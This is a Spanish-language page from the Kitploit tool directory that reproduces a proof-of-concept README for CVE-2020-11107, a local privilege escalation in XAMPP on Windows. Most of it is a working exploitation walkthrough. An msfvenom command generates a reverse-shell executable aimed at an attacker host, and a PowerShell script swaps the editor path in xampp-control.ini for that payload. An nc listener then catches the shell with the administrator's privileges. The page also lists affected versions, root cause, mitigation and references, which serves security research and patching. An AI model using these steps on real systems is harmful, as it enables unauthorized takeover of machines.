Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
Herramientas/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

Ver Repositorio
1hace 7 mesesAún no revisado

🧨 CVE-2020-11107 – Escalada de Privilegios Local en XAMPP (Windows)

📌 Resumen

CVE-2020-11107 es una vulnerabilidad de Escalada de Privilegios Local (LPE) que afecta a Apache Friends XAMPP en Windows.

Un usuario sin privilegios puede modificar el archivo de configuración del Panel de Control de XAMPP (xampp-control.ini) y reemplazar el ejecutable del editor predeterminado (notepad.exe) con un ejecutable malicioso.
Cuando otro usuario (por ejemplo, Administrador) abre los registros a través del Panel de Control, el binario malicioso se ejecuta con los privilegios de la víctima, lo que resulta en una escalada de privilegios.

❗ Esta vulnerabilidad NO afecta a Linux ni macOS.


🎯 Versiones Afectadas

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

Probado en

  • Windows 10
  • XAMPP 7.3.10

🧠 Causa Raíz

  • xampp-control.ini es escribible globalmente
  • Las rutas del Editor / Navegador son confiadas y ejecutadas
  • Los cambios de configuración afectan a todos los usuarios
  • No hay validación en las rutas de los ejecutables

🗂 Archivos Importantes

root@kitploit:~
C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 Prueba de la Vulnerabilidad

Verifica la versión de XAMPP:

root@kitploit:~
type C:\xampp\properties.ini

Salida de ejemplo:

root@kitploit:~
base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ La versión es vulnerable.


⚔️ Pasos de Explotación (PoC)

1️⃣ Generar Carga Maliciosa (Atacante – Kali)

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ Transferir la Carga Maliciosa al Objetivo

root@kitploit:~
mkdir C:\temp
# Upload msf.exe into C:\temp

3️⃣ Modificar la Configuración de XAMPP (Usuario de Bajo Privilegio)

Script de explotación (PowerShell):

root@kitploit:~
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Ejecuta el script:

root@kitploit:~
powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ Desencadenar la Ejecución (Víctima / Administrador)

La víctima ejecuta:

root@kitploit:~
C:\xampp\xampp-control.exe

Luego abre cualquier archivo de registro desde el Panel de Control.


5️⃣ Capturar la Shell (Atacante)

root@kitploit:~
nc -lvnp 4444

✅ Resultado:

root@kitploit:~
Connection received...
C:\WINDOWS\system32>

🎉 Escalada de Privilegios Exitosa


📈 Impacto

  • Escalada de Privilegios Local
  • Ejecución Arbitraria de Comandos
  • Compromiso Total del Sistema (si el Administrador lo activa)

🛡 Mitigación

  • Actualiza XAMPP a una de las siguientes versiones (o superiores):

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • Restringe los permisos en:

root@kitploit:~
C:\xampp\xampp-control.ini
  • Evita ejecutar el Panel de Control de XAMPP como Administrador

📚 Referencias

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Aviso de Apache Friends: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • Investigación Original: https://github.com/S1lkys/CVE-2020-11107
Descargar herramienta